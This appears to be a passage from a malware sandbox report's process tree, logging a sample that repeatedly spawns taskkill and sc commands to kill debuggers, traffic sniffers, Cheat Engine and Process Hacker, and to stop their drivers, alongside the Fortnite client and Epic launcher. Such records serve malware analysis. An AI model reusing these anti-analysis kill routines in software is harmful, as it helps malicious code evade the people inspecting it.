  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:116
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3244
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4800
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:664
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4272
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:3204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3816
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:452
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1664
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1288
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3684
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1428
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:784
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2284
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2012
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4320
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:1472
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2740
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1120
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:220
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3904
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3204
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1040
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:404
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3632
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4888
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3728
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4180
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1208
  - - C:\Windows\system32\sc.exe
      sc stop HTTPDebuggerPro
      4⤵
      Launches sc.exe
      PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4616
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4400
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4776
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:980
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:3852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4700
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:1344
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:220
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:3848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3836
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:3348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4916
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Kills process with taskkill
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3704
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:2912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4188
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1288
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4368
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3660
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4252
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3928
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3620
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1780
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:116
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4564
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1040
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
